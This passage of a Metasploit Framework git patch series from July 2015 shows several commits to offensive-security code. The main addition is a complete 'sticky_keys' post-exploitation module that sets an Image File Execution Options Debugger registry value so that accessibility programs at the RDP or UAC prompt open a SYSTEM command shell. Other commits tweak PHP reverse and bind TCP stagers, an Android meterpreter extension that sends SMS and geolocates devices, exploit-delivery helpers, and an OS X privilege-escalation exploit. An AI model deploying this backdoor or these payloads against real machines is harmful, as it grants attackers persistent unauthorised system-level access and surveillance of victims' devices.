+      port: FAKE_PORT,
+      service_name: 'oracle',
+      user: FAKE_USER,
+      password: FAKE_PASS
+    )
+  end
+
+  def test_postgresql
+    mod = framework.auxiliary.create('server/capture/postgresql')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'psql_client',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_pop3
+    mod = framework.auxiliary.create('server/capture/pop3')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'pop3',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_http_basic
+    mod = framework.auxiliary.create('server/capture/http_basic')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'HTTP',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_ftp
+    mod = framework.auxiliary.create('server/capture/ftp')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'ftp',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_drda
+    mod = framework.auxiliary.create('server/capture/drda')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'db2_client',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_koyo_login
+    mod = framework.auxiliary.create('scanner/scada/koyo_login')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'koyo',
+      user: '',
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_openvas_otp_login
+    mod = framework.auxiliary.create('scanner/openvas/openvas_otp_login')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'openvas-otp',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_openvas_omp_login
+    mod = framework.auxiliary.create('scanner/openvas/openvas_omp_login')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'openvas-omp',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: @result
+    )
+  end
+
+  def test_openvas_gsad_login
+    mod = framework.auxiliary.create('scanner/openvas/openvas_gsad_login')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'openvas-gsa',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_nexpose_api_login
+    mod = framework.auxiliary.create('scanner/nexpose/nexpose_api_login')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'nexpose',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
   def run
     self.methods.each do |m|
       next if m.to_s !~ /^test_.+/

From 50074c46173a9afcffd1c5acb43971a2a2c044b4 Mon Sep 17 00:00:00 2001
From: Christian Sanders <crsanders@users.noreply.github.com>
Date: Wed, 22 Jul 2015 09:05:16 -0500
Subject: [PATCH 0848/1013] Fix typo .blank to .blank?

---
 modules/auxiliary/fuzzers/dns/dns_fuzzer.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
index 1972f99d76..2d81a8f2c6 100644
--- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
+++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
@@ -340,7 +340,7 @@ class Metasploit3 < Msf::Auxiliary
       "DNSKEY,DHCID,NSEC3,NSEC3PARAM,HIP,NINFO,RKEY," <<
       "TALINK,SPF,UINFO,UID,GID,UNSPEC,TKEY,TSIG," <<
       "IXFR,AXFR,MAILA,MAILB,*,TA,DLV,RESERVED"
-    @fuzz_rr     = datastore['RR'].blank ? fuzz_rr_queries : datastore['RR']
+    @fuzz_rr     = datastore['RR'].blank? ? fuzz_rr_queries : datastore['RR']
   end
 
   def run_host(ip)

From a52bf4526d1aa1c8f491d732cb7eaf90e114f93e Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 22 Jul 2015 14:25:49 -0500
Subject: [PATCH 0849/1013] Use uniq on the globs array

This avoids search repetition.
---
 .../post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index 272b4fc6c2..038e35a54d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -146,7 +146,7 @@ class Console::CommandDispatcher::Stdapi::Fs
       return
     end
 
-    globs.each do |glob|
+    globs.uniq.each do |glob|
       files += client.fs.file.search(root, glob, recurse)
     end
 

From 691b13ebd8c82225bf15c7af22cfee0ce12334f0 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 23 Jul 2015 12:18:10 +1000
Subject: [PATCH 0850/1013] Add the sticky_keys module

---
 modules/post/windows/manage/sticky_keys.rb | 111 +++++++++++++++++++++
 1 file changed, 111 insertions(+)
 create mode 100644 modules/post/windows/manage/sticky_keys.rb

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
new file mode 100644
index 0000000000..c45f82efdc
--- /dev/null
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
+  DEBUG_REG_VALUE = 'Debugger'
+  
+  def initialize(info={})
+    super(update_info(info, 
+      'Name'         => 'Sticky Keys Persistance Module',
+      'Description'  => %q{
+        This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
+        rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
+        login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
+        for certain executables.
+
+        The module options allow for this hack to be applied to:
+
+        - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
+        - UTILMAN - utilman.exe is invoked by pressing WINDOWS+U
+        - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
+
+        The hack can be added using the ADD action, and removed with the REMOVE action.
+
+        Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
+        to the target prior to running the module. By default, a SYSTEM command prompt is installed
+        using the registry method if this module is run without modifying any parameters.
+      },
+      'Author'       => ['OJ Reeves'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter', 'cmd']
+    ))
+
+    register_options([
+      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK']]),
+      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
+    ], self.class)
+  end
+
+  #
+  # Returns the name of the executable to modify the debugger settings of.
+  #
+  def get_target_exe_name
+    case datastore['TARGET']
+    when 'UTILMAN'
+     'utilman.exe'
+    when 'OSK'
+     'osk.exe'
+    else
+     'sethc.exe'
+    end
+  end
+
+  #
+  # Returns the the key combinations required to invoke the exploit once installed.
+  #
+  def get_target_key_combo
+    case datastore['TARGET']
+    when 'UTILMAN'
+      'WINDOWS+U'
+    when 'OSK'
+      'WINDOWS+U, then launching the on-screen keyboard'
+    else
+      'SHIFT 5 times'
+    end
+  end
+
+  #
+  # Returns the full path to the target's registry key based on the current target
+  # settings.
+  #
+  def get_target_exe_reg_key
+    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"
+  end
+
+  #
+  # Runs the exploit.
+  #
+  def run
+    unless is_admin?
+      fail_with("The current session does not have administrative rights.")
+    end
+
+    print_good("Session has administrator rights, proceeding.")
+
+    target_key = get_target_exe_reg_key
+
+    if datastore['ACTION'] == 'ADD'
+      command = expand_path(datastore['EXE'])
+
+      registry_createkey(target_key)
+      registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')
+
+      print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
+    else
+      registry_deletekey(target_key)
+      print_good("'Sticky keys' removed from registry key #{target_key}.")
+    end
+  end
+
+end

From 0f2692f24f66eac4be4fe4f3b99f8ca9d2e0e1d6 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 23 Jul 2015 13:14:35 +1000
Subject: [PATCH 0851/1013] Fix up silly mistake with `fail_with`

---
 modules/post/windows/manage/sticky_keys.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index c45f82efdc..fee4bc5ac7 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -88,7 +88,7 @@ class Metasploit4 < Msf::Post
   #
   def run
     unless is_admin?
-      fail_with("The current session does not have administrative rights.")
+      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
     end
 
     print_good("Session has administrator rights, proceeding.")

From 1dd765d6e67818e5ae6cfa5b8172a93eaaacb871 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 23 Jul 2015 13:17:34 +1000
Subject: [PATCH 0852/1013] Remove trailing spaces

---
 modules/post/windows/manage/sticky_keys.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index fee4bc5ac7..146317f58d 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -13,9 +13,9 @@ class Metasploit4 < Msf::Post
 
   DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
   DEBUG_REG_VALUE = 'Debugger'
-  
+
   def initialize(info={})
-    super(update_info(info, 
+    super(update_info(info,
       'Name'         => 'Sticky Keys Persistance Module',
       'Description'  => %q{
         This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

From 0929d7695a74976dc15cc09f94bb615a6c1a5c0e Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 23 Jul 2015 14:50:04 +1000
Subject: [PATCH 0853/1013] Fix PHP stagers

---
 lib/msf/core/payload/php/bind_tcp.rb    | 2 +-
 lib/msf/core/payload/php/reverse_tcp.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
index 0ef0ee4da9..4e78d65711 100644
--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -54,7 +54,7 @@ module Payload::Php::BindTcp
       ip = '[::]'
     end
 
-    php = %Q^//<?php
+    php = %Q^/*<?php /**/
 error_reporting(0);
 $ip = '#{ip}';
 $port = #{opts[:port]};
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
index 5b509612ad..9608f7a42f 100644
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -52,7 +52,7 @@ module Payload::Php::ReverseTcp
       opts[:host] = "[#{opts[:host]}]"
     end
 
-    php = %Q^//<?php
+    php = %Q^/*<?php /**/
 error_reporting(0);
 $ip = '#{opts[:host]}';
 $port = #{opts[:port]};

From 728e9b19ec8fa57c8bdb9d483a0936cd1dd4fd44 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 23 Jul 2015 15:15:13 +1000
Subject: [PATCH 0854/1013] Update payload cached sizes

---
 modules/payloads/stagers/php/bind_tcp.rb           | 2 +-
 modules/payloads/stagers/php/bind_tcp_ipv6.rb      | 2 +-
 modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb | 2 +-
 modules/payloads/stagers/php/bind_tcp_uuid.rb      | 2 +-
 modules/payloads/stagers/php/reverse_tcp.rb        | 2 +-
 modules/payloads/stagers/php/reverse_tcp_uuid.rb   | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb
index ca2a843850..f2167c7690 100644
--- a/modules/payloads/stagers/php/bind_tcp.rb
+++ b/modules/payloads/stagers/php/bind_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 1183
+  CachedSize = 1188
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
index 4698f162a2..f8d16bb8de 100644
--- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 1182
+  CachedSize = 1187
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
index 9ef4a17a0a..bf90de7e90 100644
--- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 1356
+  CachedSize = 1361
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb
index e31bd5a8ce..1f8397b4d1 100644
--- a/modules/payloads/stagers/php/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 1357
+  CachedSize = 1362
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp
diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb
index dfb8d9d864..4fcafa11df 100644
--- a/modules/payloads/stagers/php/reverse_tcp.rb
+++ b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 931
+  CachedSize = 936
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
index 9cf8fbed77..86c152d0d4 100644
--- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 1105
+  CachedSize = 1110
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp

From 6720a57659c3397ed3d16b35463158b822b19165 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 23 Jul 2015 01:34:44 -0500
Subject: [PATCH 0855/1013] Fix #5761, pass the correct arch and platform for
 exe generation

Fix #5761
---
 lib/msf/core/exploit/cmdstager.rb                 | 3 ++-
 modules/exploits/linux/http/fritzbox_echo_exec.rb | 7 ++++---
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 865122bfb4..79998c7728 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -112,7 +112,8 @@ module Exploit::CmdStager
   def generate_cmdstager(opts = {}, pl = nil)
     select_cmdstager(opts)
 
-    self.exe = generate_payload_exe(:code => pl)
+    exe_opts = { code: pl }.merge!(opts)
+    self.exe = generate_payload_exe(exe_opts)
 
     if exe.nil?
       raise ArgumentError, 'The executable could not be generated'
diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb
index 277b464beb..1d7fffe69d 100644
--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -108,10 +108,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Exploiting...")
-
     execute_cmdstager(
-      :flavor  => :echo,
-      :linemax => 92
+      flavor: :echo,
+      linemax: 92,
+      platform: target.platform,
+      arch: target.arch
     )
   end
 end

From 31dcae6828cffafbe03b222b0b0ab6704fe71125 Mon Sep 17 00:00:00 2001
From: Jack64 <somethingsyouneverforget@gmail.com>
Date: Thu, 23 Jul 2015 16:58:55 +0100
Subject: [PATCH 0856/1013] bug fixes

---
 lib/rex/google_geolocation.rb                 |  7 +-
 .../meterpreter/extensions/android/android.rb | 22 ++++--
 .../meterpreter/extensions/android/tlv.rb     | 12 ++--
 .../ui/console/command_dispatcher/android.rb  | 69 +++++++++++--------
 4 files changed, 66 insertions(+), 44 deletions(-)

diff --git a/lib/rex/google_geolocation.rb b/lib/rex/google_geolocation.rb
index a7551cb944..03284060d1 100755
--- a/lib/rex/google_geolocation.rb
+++ b/lib/rex/google_geolocation.rb
@@ -18,15 +18,14 @@ module Rex
     attr_accessor :longitude
 
     def initialize
-      @uri = URI.parse(GOOGLE_API_URI)
+      @uri = URI.parse(URI.encode(GOOGLE_API_URI))
       @wlan_list = []
     end
 
     # Ask Google's Maps API for the location of a given set of BSSIDs (MAC
     # addresses of access points), ESSIDs (AP names), and signal strengths.
     def fetch!
-      @uri.query << @wlan_list.join("&")
-
+      @uri.query << @wlan_list.join("&wifi=")
       request = Net::HTTP::Get.new(@uri.request_uri)
       http = Net::HTTP::new(@uri.host,@uri.port)
       http.use_ssl = true
@@ -52,7 +51,7 @@ module Rex
     # @param ssid [String] ESSID associated with the mac
     # @param signal_strength [String] a thing like
     def add_wlan(mac, ssid = nil, signal_strength = nil)
-      @wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
+      @wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
     end
 
     def google_maps_url
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 97a9614388..12e43e0276 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -44,7 +44,7 @@ class Android < Extension
   def dump_sms
     sms = Array.new
     request = Packet.create_request('dump_sms')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_SMS_GROUP ) { |p|
 
@@ -64,7 +64,7 @@ class Android < Extension
   def dump_contacts
     contacts = Array.new
     request = Packet.create_request('dump_contacts')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
 
@@ -120,18 +120,26 @@ class Android < Extension
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
 
-  def send_sms(dest,body)
+  def send_sms(dest,body,dr)
     request = Packet.create_request('send_sms')
     request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
     request.add_tlv(TLV_TYPE_SMS_BODY,body)
-    response = client.send_request(request)
-    resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
-    return resp
+    request.add_tlv(TLV_TYPE_SMS_DR,dr)
+    if dr == false
+      response=client.send_request(request)
+      sr=response.get_tlv(TLV_TYPE_SMS_SR).value
+      return sr
+    else
+      response=client.send_request(request,30)
+      sr=response.get_tlv(TLV_TYPE_SMS_SR).value
+      dr=response.get_tlv(TLV_TYPE_SMS_SR).value
+      return [sr,dr]
+    end
   end
 
   def wlan_geolocate
     request = Packet.create_request('wlan_geolocate')
-    response = client.send_request(request,45)
+    response = client.send_request(request,60)
     networks=[]
     response.each( TLV_TYPE_WLAN_GROUP ) { |p|
 
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 37232b9bbf..b95b2119ac 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -33,12 +33,14 @@ TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
 
 TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
 
-TLV_TYPE_SMS_SENT   = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9021)
+TLV_TYPE_SMS_SR           = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9021)
 
-TLV_TYPE_WLAN_GROUP   = TLV_META_TYPE_GROUP      | (TLV_EXTENSIONS + 9022)
-TLV_TYPE_WLAN_BSSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9023)
-TLV_TYPE_WLAN_SSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9024)
-TLV_TYPE_WLAN_LEVEL   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9025)
+TLV_TYPE_WLAN_GROUP       = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9022)
+TLV_TYPE_WLAN_BSSID       = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9023)
+TLV_TYPE_WLAN_SSID        = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9024)
+TLV_TYPE_WLAN_LEVEL       = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9025)
+
+TLV_TYPE_SMS_DR           = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9026)
 
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 647199040e..8a40c0ef04 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
 require 'msf/core/auxiliary/report'
+require 'rex/google_geolocation'
 
 module Rex
 module Post
@@ -377,10 +378,12 @@ class Console::CommandDispatcher::Android
     send_sms_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-d' => [ true, 'Destination number' ],
-      '-t' => [ true, 'SMS body text' ]
+      '-t' => [ true, 'SMS body text' ],
+      '-dr' => [ false, 'Wait for delivery report' ]
     )
     dest=''
     body=''
+    dr=false
     send_sms_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
@@ -392,6 +395,8 @@ class Console::CommandDispatcher::Android
 	dest=val
       when '-t'
 	body=val
+      when '-dr'
+	dr=true
       end
     }
     if (dest.blank? or body.blank?)
@@ -400,11 +405,25 @@ class Console::CommandDispatcher::Android
         print_line(send_sms_opts.usage)
 	return
     end
-    sent=client.android.send_sms(dest,body)
-    if (sent)
-        print_good('SMS sent')
+
+    sent=client.android.send_sms(dest,body,dr)
+    if (dr)
+      if (sent[0]=="Transmission successful")
+          print_good("SMS sent - #{sent[0]}")
+      else
+          print_error("SMS send failed - #{sent[0]}")
+      end
+      if (sent[1]=="Transmission successful")
+          print_good("SMS delivered - #{sent[1]}")
+      else
+          print_error("SMS delivery failed - #{sent[1]}")
+      end
     else
-        print_status('SMS failed to send')
+      if (sent=="Transmission successful")
+          print_good("SMS sent - #{sent}")
+      else
+          print_error("SMS send failed - #{sent}")
+      end
     end
   end
 
@@ -422,42 +441,36 @@ class Console::CommandDispatcher::Android
         print_line(wlan_geolocate_opts.usage)
         return
       end
-    
-    print_status('Waiting for WiFi scan results...')
+    }
+
     log = client.android.wlan_geolocate
-    wlan_list=''
+    wlan_list=[]
+    wlan_str=""
     log.each{|x|
 	mac=x['bssid']
 	ssid=x['ssid']
 	ss=x['level']
-	network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
-	wlan_list << network_data
+	wlan_list << [mac,ssid,ss.to_s]
     }
 
     if wlan_list.blank?
       print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
       return
     end
+    g = Rex::GoogleGeolocation.new
 
-    # Build and send the request to Google
-    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
-    uri = URI.parse(URI.encode(url))
-    request = Net::HTTP::Get.new(uri.request_uri)
-    http = Net::HTTP::new(uri.host,uri.port)
-    http.use_ssl = true
-    response = http.request(request)
-
-    # Gather the required information from the response
-    if response && response.code == '200'
-      results = JSON.parse(response.body)
-      latitude =  results["location"]["lat"]
-      longitude = results["location"]["lng"]
-      accuracy = results["accuracy"]
-      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
-      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
-    else
-      print_error("Failure connecting to Google for location lookup.")
+    wlan_list.each do |wlan|
+      g.add_wlan(*wlan)
     end
+    begin
+      g.fetch!
+    rescue RuntimeError => e
+      print_error("Error: #{e}")
+    else
+      print_status(g.to_s)
+      print_status("Google Maps URL:  #{g.google_maps_url}")
+    end
+
 
   end
 

From 981d98443f9d5e65f6a3d9d71fb3956112294f99 Mon Sep 17 00:00:00 2001
From: Jack64 <Jack64@users.noreply.github.com>
Date: Thu, 23 Jul 2015 17:04:12 +0100
Subject: [PATCH 0857/1013] fix local mods

Fixed some local modifications that were unintentionally pushed.
---
 lib/rex/post/meterpreter/extensions/android/android.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 12e43e0276..957118fcbf 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -44,7 +44,7 @@ class Android < Extension
   def dump_sms
     sms = Array.new
     request = Packet.create_request('dump_sms')
-    response = client.send_request(request,60)
+    response = client.send_request(request)
 
     response.each( TLV_TYPE_SMS_GROUP ) { |p|
 
@@ -64,7 +64,7 @@ class Android < Extension
   def dump_contacts
     contacts = Array.new
     request = Packet.create_request('dump_contacts')
-    response = client.send_request(request,60)
+    response = client.send_request(request)
 
     response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
 
@@ -139,7 +139,7 @@ class Android < Extension
 
   def wlan_geolocate
     request = Packet.create_request('wlan_geolocate')
-    response = client.send_request(request,60)
+    response = client.send_request(request,30)
     networks=[]
     response.each( TLV_TYPE_WLAN_GROUP ) { |p|
 

From 9d8dd2f8bd2ecd0ef88254d344d72312b33478e6 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 23 Jul 2015 12:21:36 -0500
Subject: [PATCH 0858/1013] FIxup pr #5758

---
 ..._print_to_file_root.rb => dyld_print_to_file_root.rb} | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)
 rename modules/exploits/osx/local/{dlyd_print_to_file_root.rb => dyld_print_to_file_root.rb} (81%)

diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb
similarity index 81%
rename from modules/exploits/osx/local/dlyd_print_to_file_root.rb
rename to modules/exploits/osx/local/dyld_print_to_file_root.rb
index 6441915fe0..35d87fffef 100644
--- a/modules/exploits/osx/local/dlyd_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb
@@ -17,8 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
       'Description'    => %q{
-        In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
-        supported for suid binaries. This allows an arbitrary file write as root.
+        In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
+        environment variable, usually used for redirecting logging data to a
+        file, instead of the usual stderr.  Due to a design error, this feature
+        can be abused by a local attacker to write arbitrary files as root, via
+        restricted, SUID root binaries.
       },
       'Author'         => [
         'Stefan Esser', # Vulnerability discovery and PoC
@@ -69,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def sploit
